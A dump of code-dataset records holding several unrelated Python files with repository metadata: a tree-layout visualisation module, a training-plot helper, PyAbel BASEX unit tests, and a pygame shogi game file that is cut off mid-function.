] | 22 | 2018-07-12T06:16:57.000Z | 2022-01-15T03:38:51.000Z | # -*- coding: utf-8 -*-
from ._version import version_info, __version__ # noqa: F401 imported but unused
def get_include(user=False):
import os
d = os.path.dirname(__file__)
if os.path.exists(os.path.join(d, "include")):
# Package is installed
return os.path.join(d, "include")
else:
# Package is from a source directory
return os.path.join(os.path.dirname(d), "include")
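# Hedged usage sketch (added): typical consumption from a setup.py, e.g.
#     from setuptools import Extension
#     Extension("example", ["example.cpp"], include_dirs=[get_include()])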
| 30.214286 | 81 | 0.64539 | 60 | 423 | 4.366667 | 0.55 | 0.137405 | 0.114504 | 0.083969 | 0.137405 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012195 | 0.224586 | 423 | 13 | 82 | 32.538462 | 0.786585 | 0.255319 | 0 | 0 | 0 | 0 | 0.067742 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.25 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b30d2a47cc806b49df80d10546f31a2ce91bf14 | 20,347 | py | Python | h3/tree.py | rajatkapoor/pyh3 | 874b6aa94d61cd13b2d8e9232b1cc5971fc193f3 | [
"MIT"
] | 61 | 2015-08-11T00:44:58.000Z | 2022-02-10T12:14:01.000Z | h3/tree.py | rajatkapoor/pyh3 | 874b6aa94d61cd13b2d8e9232b1cc5971fc193f3 | [
"MIT"
] | 3 | 2016-02-26T17:27:19.000Z | 2016-08-12T03:04:12.000Z | h3/tree.py | rajatkapoor/pyh3 | 874b6aa94d61cd13b2d8e9232b1cc5971fc193f3 | [
"MIT"
] | 17 | 2015-08-10T20:32:55.000Z | 2019-03-13T19:33:21.000Z | import logging
import math
from collections import deque
from node import Node
from operator import itemgetter
from h3math import compute_radius, compute_hyperbolic_area, compute_delta_phi, compute_delta_theta
import mpl_toolkits.mplot3d.art3d as art3d
from matplotlib.patches import Circle
import matplotlib.pyplot as plt
from matplotlib.font_manager import FontProperties
"""
Customized exception for invalid edge input.
"""
class InvalidArgument(Exception):
pass
"""
The tree structure storing all nodes and edges, and also provide easy node lookup.
"""
class Tree(object):
"""
The Tree class is the entry point for this application. It's only argument is an iterable edgelist. This can be a
generator, list, tuple, etc. Each edge should be of the format (parent_id, child_id). They should be int types
(long is fine) and they should be consecutive. The edgelist must form a single connected Tree. If that is not
the case you'll need to prune your graph to make this the case. A common operation for displaying otherwise
cyclic graphs is to simply plot the minimum spanning tree.
:param edges: a tuple for a tree edge as (parent, child). This is required.
:type edges: iterable(tuple(int, int))
"""
def __init__(self, edges=None):
self.nodes = {}
self.height = 0
self.root = None
for parent_id, child_id in edges:
            self.insert_edge(parent_id, child_id)  # insert_edge expects (parent_id, child_id)
edges = None # Release that memory.
for id, node in self.nodes.iteritems():
if node.parent is None:
self.root = node
break
self.__label_node_generations()
self.set_subtree_radius()
self.set_subtree_size()
self.sort_children_by_radius()
self.set_placement()
def insert_edge(self, parent_id, child_id):
"""
Insert edge(parent, child) pair into the tree. No assumptions are made about the structure except that a Node
        can have exactly 1 parent, and each child can only occur once. Otherwise, cyclic graphs can be input. This will
probably cause your layout to run forever.
:param int parent_id: The id of the parent node.
:param int child_id: The id of the child node.
:returns: A tuple of the parent and child nodes as Node objects.
"""
parent = self.nodes.get(parent_id, Node(parent_id))
child = self.nodes.get(child_id, Node(child_id))
child.parent = parent
parent.children.add(child)
self.nodes[parent_id] = parent
self.nodes[child_id] = child
return parent, child
def get_leaf_nodes(self):
"""
Gets the node ids for all leaf nodes in the Tree.
        :returns: A generator of the node ids of all leaf nodes in the Tree.
"""
for node_id, node in self.nodes.iteritems():
if not node.children:
yield node.node_id
def print_tree(self):
"""
        Log the tree sorted by depth, including each node's parent, depth, number of children, subtree size, radius and area.
        The tree is traversed in a breadth-first search.
"""
current_generation = deque([self.root.node_id])
next_generation = True
while next_generation:
next_generation = deque()
while current_generation:
node_id = current_generation.popleft()
logging.info(
"{0}, parent: {1}, depth: {2}, #children: {3}, size: {4}, radius: {5}, area: {6}"
.format(node_id,
self.nodes[node_id].parent,
self.nodes[node_id].depth,
len(self.nodes[node_id].children),
self.nodes[node_id].tree_size,
self.nodes[node_id].radius,
self.nodes[node_id].area))
for child in self.nodes[node_id].children:
next_generation.append(child.node_id)
current_generation = next_generation
def __label_node_generations(self, depth=0):
"""
Decorate each node with it's depth in the tree.
:param int depth: the initial depth value for the root, default 0
"""
current_generation = deque([self.root.node_id])
next_generation = True
while next_generation:
next_generation = deque()
while current_generation:
node_id = current_generation.popleft()
self.nodes[node_id].depth = depth
for child in self.nodes[node_id].children:
next_generation.append(child.node_id)
depth += 1
current_generation = next_generation
self.height = depth - 1
def set_subtree_radius(self):
"""
Set the node's hemisphere radius and also its distance from its children. The radius is calculated
recursively from the leaf nodes, with a unit hemisphere size, tracing back to the root. The area
calculation is an approximation from a disc of the bottom of a child hemisphere to a spherical cap.
The recusion requires tracing the tree from the last generation to root so that all the nodes radii
have been calculated before their parent's radius is calcualted. As the hemisphere sizes are tightly
calculated but placing them loosely to the parent hemisphere, the space reservation is 7.2 times of
the actual size of a child hemisphere.
"""
leaf_nodes = self.get_leaf_nodes()
outermost_non_leaf = set()
for n in leaf_nodes:
N = len(self.nodes[self.nodes[n].parent.node_id].children)
self.nodes[n].radius = compute_radius(0.0025)
logging.info("leaf node {0}, parent {1}, radius {2}"
.format(n, self.nodes[n].parent, self.nodes[n].radius))
outermost_non_leaf.add(self.nodes[n].parent.node_id)
depth = self.height - 1
        current_generation = deque(list(set(n for n in outermost_non_leaf  # entries are node ids
                                            if self.nodes[n].parent is not None
                                            if self.nodes[self.nodes[n].parent.node_id].depth == depth)))
previous_generation = True
while previous_generation:
previous_generation = deque()
while current_generation:
n = current_generation.popleft()
if self.nodes[n].area == 0: # avoid duplicate parents
if self.nodes[n].parent is not None:
previous_generation.append(self.nodes[n].parent.node_id)
for child in self.nodes[n].children:
self.nodes[n].area += 7.2 * compute_hyperbolic_area(self.nodes[child.node_id].radius)
logging.info("node {0}, child {1}, child_area+ {2}, radius {3}, area {4}"
.format(n, child, compute_hyperbolic_area(self.nodes[child.node_id].radius),
self.nodes[child.node_id].radius, self.nodes[child.node_id].area))
self.nodes[n].radius = compute_radius(self.nodes[n].area)
logging.info("---> node {0}, radius {1}, area {2}"
.format(n, self.nodes[n].radius, self.nodes[n].area))
for n in outermost_non_leaf:
if n is not None:
if self.nodes[n].depth == depth:
previous_generation.append(n)
depth -= 1
current_generation = deque(list(set(previous_generation)))
def set_subtree_size(self):
"""
Set the subtree size by the number of nodes in its subtree.
"""
leaf_nodes = self.get_leaf_nodes()
depth = self.height
current_generation = deque(list(n for n in leaf_nodes
if self.nodes[n].depth == depth))
previous_generation = True
while previous_generation:
depth -= 1
previous_generation = deque()
while current_generation:
n = current_generation.popleft()
if self.nodes[n].parent is not None:
previous_generation.append(self.nodes[n].parent.node_id)
self.nodes[self.nodes[n].parent.node_id].tree_size += \
self.nodes[n].tree_size
for n in leaf_nodes:
if self.nodes[n].depth == depth:
previous_generation.append(n)
current_generation = deque(list(set(previous_generation)))
def sort_children_by_radius(self):
"""
        Sort each node's children in decreasing order of radius; an in-place sort is used.
        The tree is traversed in a breadth-first search.
"""
depth = 0
current_generation = deque([self.root.node_id])
next_generation = True
while next_generation:
next_generation = deque()
while current_generation:
node_id = current_generation.popleft()
for child in self.nodes[node_id].children:
next_generation.append(child.node_id)
child_size_pair = [[child, self.nodes[child.node_id].radius]
for child in self.nodes[node_id].children]
child_size_pair.sort(key=itemgetter(1), reverse=True)
if child_size_pair:
self.nodes[node_id].children = list(zip(*child_size_pair)[0])
depth += 1
current_generation = next_generation
def sort_children_by_tree_size(self):
"""
        Sort each node's children in decreasing order of subtree size (number of nodes); an
        in-place sort is used. This is an alternative option to sort the tree before placing the
        nodes on the hemisphere. The original H3 algorithm sets the leaf node radius as math:: N / alpha
        so that nodes with many siblings can have a larger radius, as can nodes with a lot of children.
"""
depth = 0
current_generation = deque([self.root])
next_generation = True
while next_generation:
next_generation = deque()
while current_generation:
node_id = current_generation.popleft()
for child in self.nodes[node_id].children:
next_generation.append(child)
child_size_pair = [[child, self.nodes[child].tree_size]
for child in self.nodes[node_id].children]
child_size_pair.sort(key=itemgetter(1), reverse=True)
if child_size_pair:
self.nodes[node_id].children = list(zip(*child_size_pair)[0])
depth += 1
current_generation = next_generation
def set_placement(self):
"""
Placing the hemispheres on the root hemisphere. Start from the pole, placing the largest child
hemisphere and then placing smaller hemispheres around the pole. When the hemispheres fully filled
one band, start placing on the next band until fully filled again.
        Note:
            - When placing the 1st hemisphere its phi is zero, which could lead to a ZeroDivisionError exception,
so we set its value as a very small number (0.000001)
- Don't forget to reserve space for the other half of the hemisphere, both the right half and
the lower half. Add theta by delta_theta after placing each node. Add phi by the max
delta_phi in the last band before placing hemispheres to the next band
- Each subtree is independent from each other, so if the new node has a different parent node
than the previous parent node, we know this node is in a different subtree and initialize
              phi, theta, delta_theta and band, and start placing nodes all over again.
"""
depth = 0
current_generation = deque([n.node_id for n in self.nodes[self.root.node_id].children])
next_generation = True
last_parent = self.root
while next_generation:
next_generation = deque()
phi, theta, delta_theta, band = 0.000001, 0., 0., 1
last_max_phi = 0 # span phi before jumping to the next band
while current_generation:
node = current_generation.popleft()
if self.nodes[node].parent != last_parent: # same gen, diff parent
last_parent = self.nodes[node].parent
phi, theta, delta_theta, band = 0.000001, 0., 0., 1
rp = self.nodes[self.nodes[node].parent.node_id].radius
try:
if phi == 0.000001: # first child of root
phi += compute_delta_phi(self.nodes[node].radius, rp)
self.nodes[node].band = 0
else:
delta_theta = compute_delta_theta(self.nodes[node].radius, rp, phi)
if (theta + delta_theta) <= 2 * math.pi:
theta += delta_theta
if last_max_phi:
last_max_phi = compute_delta_phi(self.nodes[node].radius, rp)
phi += compute_delta_phi(self.nodes[node].radius, rp)
else:
band += 1
theta = delta_theta
phi += last_max_phi + compute_delta_phi(self.nodes[node].radius, rp)
last_max_phi = 0
self.nodes[node].band = band
self.nodes[node].theta = theta
self.nodes[node].phi = phi
except ZeroDivisionError as e:
logging.error("{0}\n node {1}, radius={2}, rp={3}, phi={4}, parent={5}"
.format(e, node, self.nodes[node].radius, rp, phi,
self.nodes[node].parent))
self.nodes[node].coord.sph_to_cart(self.nodes[node].theta,
self.nodes[node].phi,
self.nodes[self.nodes[node].parent.node_id].radius)
                if self.nodes[node].parent != self.root:  # parent is a Node, so compare against the root Node
self.nodes[node].coord.coordinate_transformation(
self.nodes[self.nodes[node].parent.node_id].theta,
self.nodes[self.nodes[node].parent.node_id].phi)
self.nodes[node].coord.cart_offset(self.nodes[self.nodes[node].parent.node_id].coord)
logging.info("node {0}, radius {1}, band {2}, theta {3}, phi {4}"
.format(node, self.nodes[node].radius, self.nodes[node].band,
self.nodes[node].theta, self.nodes[node].phi))
logging.info("node {0}, x {1}, y {2}, z {3}, w {4}"
.format(node, self.nodes[node].coord.x, self.nodes[node].coord.y,
self.nodes[node].coord.z, self.nodes[node].coord.w))
theta += delta_theta # reserve space for the other half sphere
for child in self.nodes[node].children:
next_generation.append(child.node_id)
depth += 1
current_generation = next_generation
def scatter_plot(self, equators=True, tagging=True, depth_cap=None, node_coloring=None):
"""
Plot the tree with nodes and edges, optionally equators and tagging nodes with node numbers.
        The tree is traversed in a breadth-first search.
Note:
- To distinct each generations, a color plate of ["blue", "red", "yellow", "green", "black"]
is used repeatedly.
            - The X, Y, Z axes have been labelled.
            - When the number of nodes is large and the tree is bushy, it is advisable to disable tagging for
better user experience.
:param bool equators: whether to draw the 3D equators, default True
:param bool tagging: whether to tag nodes with node numbers, default True
:param int depth_cap: a filter for rendering the first N generations, default tree height
:param dict node_coloring: an optional map from node_id : color, to color individual nodes
"""
if depth_cap is None:
depth_cap = self.height
fig = plt.figure(figsize=(12, 10))
ax = fig.add_subplot(111, projection="3d")
plt.subplots_adjust(left=0, bottom=0, right=1, top=1, wspace=0, hspace=0)
xs = [self.nodes[self.root.node_id].coord.x]
ys = [self.nodes[self.root.node_id].coord.y]
zs = [self.nodes[self.root.node_id].coord.z]
plot_color_board = ["blue", "red", "yellow", "green", "black"]
font0 = FontProperties()
font0.set_size(8)
current_generation = deque([self.root.node_id])
next_generation = True
while next_generation:
next_generation = deque()
while current_generation:
n = current_generation.popleft()
if self.nodes[n].depth <= depth_cap:
xs.append(self.nodes[n].coord.x)
ys.append(self.nodes[n].coord.y)
zs.append(self.nodes[n].coord.z)
if tagging:
ax.text(self.nodes[n].coord.x + 0.01,
self.nodes[n].coord.y + 0.01,
self.nodes[n].coord.z + 0.01,
("n{0}".format(n)), fontproperties=font0)
for child in self.nodes[n].children:
next_generation.append(child.node_id)
if self.nodes[n].depth <= depth_cap:
xe = [self.nodes[n].coord.x, self.nodes[child.node_id].coord.x]
ye = [self.nodes[n].coord.y, self.nodes[child.node_id].coord.y]
ze = [self.nodes[n].coord.z, self.nodes[child.node_id].coord.z]
if node_coloring:
ax.plot(xe, ye, ze, node_coloring.get(n, 'black'))
else:
ax.plot(xe, ye, ze, plot_color_board[self.nodes[n].depth % 5])
current_generation = next_generation
ax.scatter(xs, ys, zs, c="r", marker="o")
global_radius = self.nodes[self.root.node_id].radius * 1.12
if equators:
for axis in ["x", "y", "z"]:
circle = Circle((0, 0), global_radius * 1.1)
circle.set_clip_box(ax.bbox)
circle.set_edgecolor("gray")
circle.set_alpha(0.3)
circle.set_facecolor("none") # "none" not None
ax.add_patch(circle)
art3d.pathpatch_2d_to_3d(circle, z=0, zdir=axis)
ax.set_xlim([-1.2 * global_radius, 1.2 * global_radius])
ax.set_ylim([-1.2 * global_radius, 1.2 * global_radius])
ax.set_zlim([-1.2 * global_radius, 1.2 * global_radius])
ax.set_xlabel("X Label")
ax.set_ylabel("Y Label")
ax.set_zlabel("Z Label")
plt.show()
def get_coordinates(self):
"""
Returns a generator of all the coordinates for this plot. This can be used to build SVGs or whatever.
:return: A generator of tuples of (x, y, z) representing the position of each node in 3-d space.
"""
current_generation = deque([self.root.node_id])
next_generation = True
while next_generation:
next_generation = deque()
while current_generation:
node_id = current_generation.popleft()
yield (self.nodes[node_id].coord.x,
self.nodes[node_id].coord.y,
self.nodes[node_id].coord.z)
for child in self.nodes[node_id].children:
next_generation.append(child.node_id)
current_generation = next_generation
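# Hedged usage sketch (added; assumes the local node/h3math modules resolve):
#     edges = [(0, 1), (0, 2), (1, 3), (1, 4)]  # (parent_id, child_id) pairs
#     tree = Tree(edges=edges)                  # the full layout runs in __init__
#     tree.scatter_plot(tagging=False)          # render with matplotlib
#     for x, y, z in tree.get_coordinates():    # or export the raw positions
#         print(x, y, z)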
| 48.101655 | 120 | 0.57291 | 2,571 | 20,347 | 4.404123 | 0.160638 | 0.092997 | 0.059701 | 0.02517 | 0.481145 | 0.405546 | 0.338691 | 0.299302 | 0.257617 | 0.22759 | 0 | 0.012192 | 0.33892 | 20,347 | 422 | 121 | 48.21564 | 0.829604 | 0.231975 | 0 | 0.393728 | 0 | 0.010453 | 0.028206 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041812 | false | 0.003484 | 0.034843 | 0 | 0.087108 | 0.003484 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b31f0b330141ac44d0ebd212cbd8605bcb60314 | 1,530 | py | Python | utils/plot_results.py | miniautonomous/trainer_ai | 953b6c22b65e249a9d7595d15c78c24c12bc254e | [
"MIT"
] | 1 | 2021-06-23T22:32:53.000Z | 2021-06-23T22:32:53.000Z | utils/plot_results.py | miniautonomous/trainer_ai | 953b6c22b65e249a9d7595d15c78c24c12bc254e | [
"MIT"
] | null | null | null | utils/plot_results.py | miniautonomous/trainer_ai | 953b6c22b65e249a9d7595d15c78c24c12bc254e | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
def plot_results(model_name: str, history, history_keys: list, training_dictionary: dict):
"""
Plot the results of a simulation.
Parameters
----------
model_name: (str) model name
history: (tf history) result of a Keras model fit
    history_keys: (list) list of losses and metrics related to the training fit
training_dictionary: (dict) configuration of training options
"""
# Plot loss
fig = plt.figure(figsize=(20, 10))
ax = plt.subplot(2, 1, 1)
plt.subplots_adjust(hspace=0.6)
ax.plot(history.history[history_keys[0]], color='b', linestyle='-', linewidth=5)
ax.plot(history.history[history_keys[2]], color='r', linestyle='--', linewidth=5)
plt.title('Loss', fontsize=18)
plt.xlabel('epoch', fontsize=16)
plt.ylabel(history_keys[0], fontsize=16)
plt.xticks(fontsize=14)
plt.yticks(fontsize=14)
plt.legend(['train', 'validation'], loc='best')
# Plot accuracy
ax = plt.subplot(2, 1, 2)
ax.plot(history.history[history_keys[1]], color='b', linestyle='-', linewidth=5)
ax.plot(history.history[history_keys[3]], color='r', linestyle='--', linewidth=5)
plt.title('Accuracy', fontsize=18)
plt.xlabel('epoch', fontsize=16)
plt.ylabel(history_keys[1], fontsize=16)
plt.xticks(fontsize=14)
plt.yticks(fontsize=14)
plt.legend(['train', 'validation'], loc='best')
if training_dictionary['save_curve']:
fig.savefig(model_name+'_loss_and_accuracy.png')
plt.show()
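# Hedged usage sketch (added): key order must match the indexing above, i.e.
# [train_loss, train_metric, val_loss, val_metric]; with default Keras naming:
#     history = model.fit(x, y, validation_split=0.2, epochs=10)
#     plot_results('my_model', history,
#                  ['loss', 'accuracy', 'val_loss', 'val_accuracy'],
#                  {'save_curve': True})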
| 36.428571 | 89 | 0.66732 | 212 | 1,530 | 4.721698 | 0.367925 | 0.125874 | 0.08991 | 0.07992 | 0.533467 | 0.505495 | 0.443556 | 0.377622 | 0.377622 | 0.377622 | 0 | 0.033175 | 0.172549 | 1,530 | 41 | 90 | 37.317073 | 0.757504 | 0.195425 | 0 | 0.32 | 0 | 0 | 0.086076 | 0.018565 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04 | false | 0 | 0.04 | 0 | 0.08 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b34aa1af56249ef97f4b6fdf0c203875ab7d112 | 1,971 | py | Python | abel/tests/test_basex.py | Derollez/PyAbel | c8be4ed7e8e08ee026634b9e856fb473e58d7330 | [
"MIT"
] | null | null | null | abel/tests/test_basex.py | Derollez/PyAbel | c8be4ed7e8e08ee026634b9e856fb473e58d7330 | [
"MIT"
] | null | null | null | abel/tests/test_basex.py | Derollez/PyAbel | c8be4ed7e8e08ee026634b9e856fb473e58d7330 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os.path
import numpy as np
from numpy.testing import assert_allclose
import abel
DATA_DIR = os.path.join(os.path.split(__file__)[0], 'data')
def test_basex_basis_sets_cache():
# n_vert, n_horz = 121,121
# nbf_vert, nbf_horz = 121, 61
n = 121
file_name = os.path.join(DATA_DIR, "basex_basis_{}_{}_{}_{}.npy".format(n, n, n, n//2+1))
if os.path.exists(file_name):
os.remove(file_name)
    # 1st call generates and saves the basis set
abel.basex.get_bs_basex_cached(n,n, basis_dir=DATA_DIR, verbose=False)
    # 2nd call loads it from file
abel.basex.get_bs_basex_cached(n,n, basis_dir=DATA_DIR, verbose=False)
if os.path.exists(file_name):
os.remove(file_name)
def test_basex_shape():
n = 21
x = np.ones((n, n), dtype='float32')
bs = abel.basex.get_bs_basex_cached(n,n, basis_dir=None, verbose=False)
recon = abel.basex.basex_core_transform(x, *bs)
assert recon.shape == (n, n)
def test_basex_zeros():
n = 21
x = np.zeros((n, n), dtype='float32')
bs = abel.basex.get_bs_basex_cached(n,n, basis_dir=None, verbose=False)
recon = abel.basex.basex_core_transform(x, *bs)
assert_allclose(recon, 0)
def test_basex_step_ratio():
"""Check a gaussian solution for BASEX"""
n = 51
r_max = 25
ref = abel.tools.analytical.GaussianAnalytical(n, r_max, symmetric=True, sigma=10)
tr = np.tile(ref.abel[None, :], (n, 1)) # make a 2D array from 1D
bs = abel.basex.get_bs_basex_cached(n,n, basis_dir=None, verbose=False)
recon = abel.basex.basex_core_transform(tr, *bs)
recon1d = recon[n//2 + n%2]
ratio = abel.benchmark.absolute_ratio_benchmark(ref, recon1d)
assert_allclose( ratio , 1.0, rtol=3e-2, atol=0)
if __name__ == '__main__':
test_basex_basis_sets_cache()
test_basex_shape()
test_basex_zeros()
test_basex_step_ratio()
| 27.760563 | 93 | 0.690005 | 320 | 1,971 | 3.940625 | 0.3 | 0.017446 | 0.047581 | 0.055512 | 0.421094 | 0.384615 | 0.384615 | 0.384615 | 0.384615 | 0.384615 | 0 | 0.028554 | 0.182648 | 1,971 | 70 | 94 | 28.157143 | 0.75419 | 0.083714 | 0 | 0.295455 | 0 | 0 | 0.02951 | 0.015033 | 0 | 0 | 0 | 0 | 0.090909 | 1 | 0.090909 | false | 0 | 0.159091 | 0 | 0.25 | 0.022727 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5b3a8027dd21491237d65a61527430d014ff49a1 | 23,554 | py | Python | shogi-main1.py | GudSirSnek/GameOfShogi | 3961cdcba68561de9eb98d96dcc50df498cc9fcc | [
"Apache-2.0"
] | null | null | null | shogi-main1.py | GudSirSnek/GameOfShogi | 3961cdcba68561de9eb98d96dcc50df498cc9fcc | [
"Apache-2.0"
] | null | null | null | shogi-main1.py | GudSirSnek/GameOfShogi | 3961cdcba68561de9eb98d96dcc50df498cc9fcc | [
"Apache-2.0"
] | null | null | null | #main class handles user input and current gameState class
import pygame as p
import shogiEngine1
import os
import copy
import Piece
import Menu
height = 1057 #defines the board resolution
width = 1920
sq_size = 66
x_offset = 459
y_offset = 243
scale = 1
p.font.init()
myfont = p.font.SysFont('Comic Sans MS', 28//scale)
myfont1 = p.font.SysFont('Comic Sans MS', 10//scale)
HEIGHT = height//scale
WIDTH = width//scale
SQ_size = sq_size//scale #defines the size of each square
xoffset = x_offset//scale
yoffset = y_offset//scale
MAX_FPS = 15
IMAGES = {}
IMAGES_TAKEN = {}
background = p.transform.scale(p.image.load("images/wood-square.png") , (706//scale, 706//scale))
colors = [p.color.Color("white"), p.color.Color("gray"), p.color.Color("black"), p.color.Color("green"), p.color.Color("purple")]
def load_Images(SQ_size, type):
pieces = ["BL", "BN", "BS", "BG", "BK", "BB", "BR", "BP", "WL", "WN", "WS", "WG", "WK", "WB","WR", "WP"]
if type == 1:
for piece in pieces:
IMAGES[piece] = p.transform.scale(p.image.load("images/" + piece + ".png") , (SQ_size, SQ_size))
IMAGES_TAKEN[piece] = p.transform.scale(p.image.load("images/" + piece + ".png") , (66//scale, 66//scale))
else:
for piece in pieces:
IMAGES[piece] = p.transform.scale(p.image.load("images/JAP/" + piece + ".png") , (SQ_size, SQ_size))
IMAGES_TAKEN[piece] = p.transform.scale(p.image.load("images/JAP/" + piece + ".png") , (66//scale, 66//scale))
def drawGameState(screen, gs, playerClicks, Wmoves, Bmoves, GO, MH, color, SQ_size): #graphics for current gamestate
screen.fill(colors[0]) #reset screen to white
drawBoard(screen, gs, playerClicks, Wmoves, Bmoves, MH, color, SQ_size) #draw squares on drawBoard
drawPieces(screen, gs, SQ_size) #draw pieces on top of squares
drawMoveHistory(screen, gs.moveLog) #draw move history
drawTaken(screen, gs.Wcapture, gs.Bcapture) #draw taken pieces
drawTimer(screen, gs) #draw player times
if GO[2]: #Checks for game over
drawWin(screen, GO)
if gs.Wtimer <= 0:
drawWin(screen, [False, True, True])
elif gs.Btimer <= 0:
drawWin(screen, [True, False, True])
def drawBoard(screen, gs, playerClicks, Wmoves, Bmoves, MH, color, SQ_size): #draw squares, later on: implement custom colors
screen.blit(background, p.rect.Rect(403//scale, 187//scale, 706//scale, 706//scale))#draws backdrop of board
k = [-1, -1]
    for r in range(gs.dimensionsx): #this nested loop iterates over all squares in the board and generates them on the screen
for c in range(gs.dimensionsy):
colo = color[((r+c)%2)] #this line dictates the color of the square currently iterating
p.draw.rect(screen, colo, p.rect.Rect(c*SQ_size+xoffset, r*SQ_size+yoffset, SQ_size, SQ_size))
    if len(playerClicks) == 1 and MH: #this portion is used when a piece has been selected to move but hasn't been moved yet
#this portion is to highlight all possible moves of that piece
moveset = []
        if gs.whiteToMove: #checks whose turn it is
for i in Wmoves: #iterates over the White possible moves to find the selected piece's moveset
if i[2][0] == playerClicks[0][0] and i[2][1] == playerClicks[0][1]:
k = [i[2][0], i[2][1]]
moveset = i[3]
break
else: #same as lines 65-70 but for the Black player
for i in Bmoves:
if i[2][0] == playerClicks[0][0] and i[2][1] == playerClicks[0][1]:
k = [i[2][0], i[2][1]]
moveset = i[3]
break
for i in moveset: #iterates over the selected piece's possible moves and highlight the squares in green
p.draw.rect(screen, colors[4], p.rect.Rect(i[1]*SQ_size+xoffset, i[0]*SQ_size+yoffset, SQ_size, SQ_size))
def drawPieces(screen, gs, SQ_size): #draw pieces on board using current gameState
for r in range(gs.dimensionsx):
for c in range(gs.dimensionsy): #nested loop used to iterate over all squares in the board
piece = gs.board[r][c]
if piece != "--": #not empty square
if piece.Color != "Null": #not an empty square
screen.blit(IMAGES[piece.Color[0] + piece.Name[0]], p.rect.Rect(piece.Position[1]*SQ_size+xoffset, piece.Position[0]*SQ_size+yoffset, SQ_size, SQ_size))
def drawPromotion(screen):
p.draw.rect(screen, colors[1], p.rect.Rect(1000//scale, 1000//scale, 156//scale, 48//scale))
yes = myfont.render("yes", True, (255, 255, 255))
screen.blit(yes, (1000//scale, 1000//scale))
p.draw.rect(screen, colors[1], p.rect.Rect(1000//scale + 156//scale, 1000//scale, 156//scale, 48//scale))
no = myfont.render("no", True, (255, 255, 255))
screen.blit(no, (1000//scale + 156//scale, 1000//scale))
def drawMoveHistory(screen, moveLog):
p.draw.rect(screen, colors[2], p.rect.Rect(1506//scale, 82//scale, 156//scale, 48//scale)) #draws box which move history will appear in
    undo = myfont.render("UNDO", True, (255, 255, 255)) #draws undo tab
screen.blit(undo, (1506//scale, 82//scale))
xsize = (390//3 - 2)//scale
ysize = (862//25 -1)//scale
for i in range(0, 25): #generates individual cells which each move will appear in
p.draw.rect(screen, colors[2], p.rect.Rect(1507//scale + 1, (148//scale)+(i*(ysize + 1)), xsize, ysize), 1)
if len(moveLog) >= 25: #sees if the length of the movelog is above limits
r = 25
M = moveLog[-25:] #here, M only contains the 25 most recent moves
else:
r = len(moveLog)
M = moveLog.copy()
M.reverse()
for i in range(r): #iterates over M and prints each move
m = M[i]
text1 = myfont.render(m.getShogiNotation(), True, (0, 0, 0))
        text2 = myfont.render("---->", True, (0, 0, 0)) #rendered but currently never blitted
screen.blit(text1,(1517//scale + 1,(140//scale)+(i*(ysize + 1))))
def drawTaken(screen, Wcapture, Bcapture):
p.draw.rect(screen, colors[2], p.rect.Rect(403//scale, 46//scale, 462//scale, 66//scale), 2)#draws rectangle that will hold White piece graphics
    p.draw.rect(screen, colors[2], p.rect.Rect(403//scale, 112//scale, 462//scale, 66//scale), 2) #draws rectangle that will hold number of each piece captured
p.draw.rect(screen, colors[2], p.rect.Rect(403//scale, 900//scale, 462//scale, 66//scale), 2) #same as 134 but for white player
p.draw.rect(screen, colors[2], p.rect.Rect(403//scale, 966//scale, 462//scale, 66//scale), 2) #same as 135 but for white player
pieces = ["BL", "BN", "BS", "BG", "BB", "BR", "BP", "WL", "WN", "WS", "WG", "WB","WR", "WP"]
for i in range(7):
screen.blit(IMAGES_TAKEN[pieces[i]], p.rect.Rect((403+66*i)//scale, 112//scale, 66//scale, 66//scale))
screen.blit(IMAGES_TAKEN[pieces[i+7]], p.rect.Rect((403+66*i)//scale, 900//scale, 66//scale, 66//scale))
Wcount = [0, 0, 0, 0, 0, 0, 0]
Bcount = [0, 0, 0, 0, 0, 0, 0]
for i in Wcapture:
if i.Name == "Lance":
Wcount[0] = Wcount[0] + 1
elif i.Name == "Night":
Wcount[1] = Wcount[1] + 1
elif i.Name == "Silver General":
Wcount[2] = Wcount[2] + 1
elif i.Name == "Gold General":
Wcount[3] = Wcount[3] + 1
elif i.Name == "Bishop":
Wcount[4] = Wcount[4] + 1
elif i.Name == "Rook":
Wcount[5] = Wcount[5] + 1
elif i.Name == "Pawn":
Wcount[6] = Wcount[6] + 1
for i in Bcapture:
if i.Name == "Lance":
Bcount[0] = Bcount[0] + 1
elif i.Name == "Night":
Bcount[1] = Bcount[1] + 1
elif i.Name == "Silver General":
Bcount[2] = Bcount[2] + 1
elif i.Name == "Gold General":
Bcount[3] = Bcount[3] + 1
elif i.Name == "Bishop":
Bcount[4] = Bcount[4] + 1
elif i.Name == "Rook":
Bcount[5] = Bcount[5] + 1
elif i.Name == "Pawn":
Bcount[6] = Bcount[6] + 1
for i in range(len(Wcount)):
text1 = myfont.render(str(Wcount[i]), True, (0, 0, 0))
